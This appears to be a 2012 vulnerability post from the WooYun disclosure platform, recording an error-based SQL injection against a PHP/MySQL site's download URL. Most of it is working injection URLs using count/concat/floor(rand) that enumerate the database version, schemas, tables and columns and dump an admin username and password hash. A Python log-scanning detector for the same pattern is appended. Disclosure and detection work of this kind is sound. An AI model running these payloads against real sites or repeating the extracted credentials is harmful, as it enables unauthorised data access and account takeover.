php+mysql advanced error-based injection, tested and confirmed working

Posted on 2012-9-13 17:52:09
http://www.wooyun.org/bugs/wooyun-2010-01666

I had been looking for something to test this on and did not expect to find one here, so I tested it and am just keeping a record.

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php

Or

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********enumerate database names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********enumerate table names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********enumerate column names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 341 351 361
/**********dump data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
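
Every request recorded in the post has the same shape: a derived table that combines count(*), concat(...), floor(rand(0)*2) and group by, placed in a URL path segment. As an added example (not part of the original post), the following Python detector flags that shape in web access logs; the combined log format, the sample lines, the IP addresses and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Structural markers shared by every request recorded in the post.
MARKERS = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)"),
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)"),
    "group_by": re.compile(r"group\s+by\b"),
    "concat": re.compile(r"concat\s*\("),
}
REQUIRED = {"rand_floor", "count_star", "group_by"}
# Reported separately: the requests in the post also read information_schema.
METADATA = re.compile(r"information_schema\s*\.\s*(schemata|tables|columns)")
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log (documentation IP range, no real host).
SAMPLE_LOG = """\
192.0.2.10 - - [13/Sep/2012:17:40:01 +0800] "GET /download/downpage/netarea/id/1600003/wapc/5000_0005_003 HTTP/1.1" 200 5120
192.0.2.77 - - [13/Sep/2012:17:41:12 +0800] "GET /download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003 HTTP/1.1" 200 731
192.0.2.31 - - [13/Sep/2012:17:42:40 +0800] "GET /search?q=group+by+tutorial HTTP/1.1" 200 2048
""".splitlines()


def normalize(raw_path):
    """Decode %xx and '+' twice (double encoding), drop /**/ comments, lowercase."""
    decoded = unquote_plus(unquote_plus(raw_path))
    return INLINE_COMMENT.sub(" ", decoded).lower()


def classify(raw_path):
    """Return the markers a request path carries and whether it matches."""
    text = normalize(raw_path)
    hits = {name for name, rx in MARKERS.items() if rx.search(text)}
    return {
        "match": REQUIRED <= hits,
        "markers": sorted(hits),
        "reads_metadata": bool(METADATA.search(text)),
    }


def scan(log_lines):
    """Return [(client_ip, verdict)] for log lines whose request path matches."""
    found = []
    for line in log_lines:
        m = REQUEST.match(line)
        if m and classify(m.group(2))["match"]:
            found.append((m.group(1), classify(m.group(2))))
    return found
```

Calling `scan(SAMPLE_LOG)` returns a single hit for the constructed client 192.0.2.77; the plain download request and the search for "group by" are not flagged because the match requires all three structural markers together.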